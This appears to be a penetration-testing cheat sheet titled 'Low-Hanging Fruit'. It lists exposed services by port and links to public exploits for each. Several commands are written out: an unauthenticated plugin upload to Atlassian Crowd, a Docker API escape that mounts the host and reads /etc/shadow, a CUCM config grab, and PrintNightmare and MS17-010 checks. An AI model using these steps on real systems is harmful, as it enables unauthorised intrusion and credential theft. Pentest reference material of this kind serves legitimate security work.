Low-Hanging Fruit

Easy ways to get a shell

Services

Adobe ColdFusion BlazeDS

Ports: 8080 Exploit:

Adobe ColdFusion BlazeDS Java Object Deserialization RCEwww.tenable.com

Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code ExecutionExploit Database

Apache Flink

Ports: 5000 Exploit:

Rapid7Rapid7

Apache Flink 1.9.x - File Upload RCE (Unauthenticated)Exploit Database

Apache Hadoop

Ports: 8088 Exploit:

Rapid7Rapid7

vulhub/hadoop/unauthorized-yarn/exploit.py at master · vulhub/vulhubGitHub

Apache Solr

Ports: 8983 Exploit:

GitHub - jas502n/solr_rce: Apache Solr RCE via Velocity templateGitHub

GitHub - Imanfeng/Apache-Solr-RCE: Apache Solr Exploits 🌟GitHub

Apache Spark

Ports: 6066 Exploit:

GitHub - ivanitlearning/CVE-2018-11770: Python RCE exploit for Apache Spark rewritten from Metasploit moduleGitHub

Rapid7Rapid7

Atlassian Crowd

Ports: 4990 Exploit:

curl -k -H "Content-Type: multipart/mixed" \ --form "[email protected]" http://[HOST]:4990/crowd/admin/uploadplugin.action

Triggered!*(#*!(#*!packetstormsecurity.com

Cisco Smart Install

Ports: 4786 Exploit:

Rapid7Rapid7

GitHub - frostbits-security/SIET: Smart Install Exploitation ToolGitHub

Cisco Unified Communications Manager

Ports: 6970 Exploit:

curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt

GitHub - trustedsec/SeeYouCM-ThiefGitHub

Dameware

Ports: 6129 Exploit:

SolarWinds Dameware Mini Remote Control Unauthenticated RCETenable®

poc/Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py at master · tenable/pocGitHub

Dell iDrac

Ports: 443

Exploit:

Rapid7Rapid7

Docker API

Ports: 2375 Exploit:

docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

File Access: cat /mnt/etc/shadow
Remote Code Execution: chroot /mnt

GlassFish

Ports: 4848 Exploit:

Rapid7Rapid7

Hashicorp Consul

Ports: 8500 Exploit:

Rapid7Rapid7

HP Data Protector

Ports: 5555, 5556 Exploit:

Rapid7Rapid7

HP iLO

Ports: 80, 443

Exploit:

CVE-2017-12542/exploit_1.py at master · skelsec/CVE-2017-12542GitHub

IBM Websphere

Ports: 8880 Exploit:

Rapid7Rapid7

IPMI

Ports: 623 Exploit:

Rapid7Rapid7

Java RMI

Ports: 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999 Exploit:

Rapid7Rapid7

https://itnext.io/java-rmi-for-pentesters-structure-recon-and-communication-non-jmx-registries-a10d5c996a79itnext.io

https://itnext.io/java-rmi-for-pentesters-part-two-reconnaissance-attack-against-non-jmx-registries-187a6561314ditnext.io

JBoss

Ports: 4444, 4445, 11111 Exploit:

Rapid7Rapid7

GitHub - joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation ToolGitHub

JDWP

Ports: 5005 - 5009, 45000, 45001 Exploit:

Rapid7Rapid7

GitHub - IOActive/jdwp-shellifierGitHub

JMX

Ports: 8686, 9012, 50500 Exploit:

Rapid7Rapid7

MS17-010: Eternal Blue

Ports 139, 445

Exploit:

nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip

Rapid7Rapid7

Portainer

Ports: 9000 Exploit:

GitHub - MauroEldritch/PAZUZU: PAZUZU (Portainer Authentication Zap Using Zero Utilities) is a ruby exploit for vulnerable Portainer instances (--no-auth). Featured @ DevFest Siberia 2018.GitHub

GitHub - MauroEldritch/lempo: LEMPO (Ldap Exposure on POrtainer) is an exploit for CVE-2018-19466 (LDAP Credentials Disclosure on Portainer). Featured @ DevFest Siberia 2018GitHub

PrintNightmare

crackmapexec smb $host_file -u $username -p $password -M spooler

GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527GitHub

Redis

Ports: 6379 Exploit:

Rapid7Rapid7

SAP

Ports: 3300 Exploit:

GitHub - chipik/SAP_GW_RCE_exploit: SAP Gateway RCE exploitsGitHub

WebLogic

Ports: 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503 Exploit:

OffSec’s Exploit Database Archivewww.exploit-db.com

Zoho Manageengine Desktop

Ports: 8383 Exploit:

https://srcincite.io/pocs/src-2020-0011.py.txtsrcincite.io

References

GitHub - trustedsec/spoonmapGitHub

PreviousTimestomping NextNetworks

Last updated 2 years ago

hashtagServices

hashtagAdobe ColdFusion BlazeDS

hashtagApache Flink

hashtagApache Hadoop

hashtagApache Solr

hashtagApache Spark

hashtagAtlassian Crowd

hashtagCisco Smart Install

hashtagCisco Unified Communications Manager

hashtagDameware

hashtagDell iDrac

hashtagDocker API

hashtagGlassFish

hashtagHashicorp Consul

hashtagHP Data Protector

hashtagHP iLO

hashtagIBM Websphere

hashtagIPMI

hashtagJava RMI

hashtagJBoss

hashtagJDWP

hashtagJMX

hashtagMS17-010: Eternal Blue

hashtagPortainer

hashtagPrintNightmare

hashtagRedis

hashtagSAP

hashtagWebLogic

hashtagZoho Manageengine Desktop

hashtagReferences

Services

Adobe ColdFusion BlazeDS

Apache Flink

Apache Hadoop

Apache Solr

Apache Spark

Atlassian Crowd

Cisco Smart Install

Cisco Unified Communications Manager

Dameware

Dell iDrac

Docker API

GlassFish

Hashicorp Consul

HP Data Protector

HP iLO

IBM Websphere

IPMI

Java RMI

JBoss

JDWP

JMX

MS17-010: Eternal Blue

Portainer

PrintNightmare

Redis

SAP

WebLogic

Zoho Manageengine Desktop

References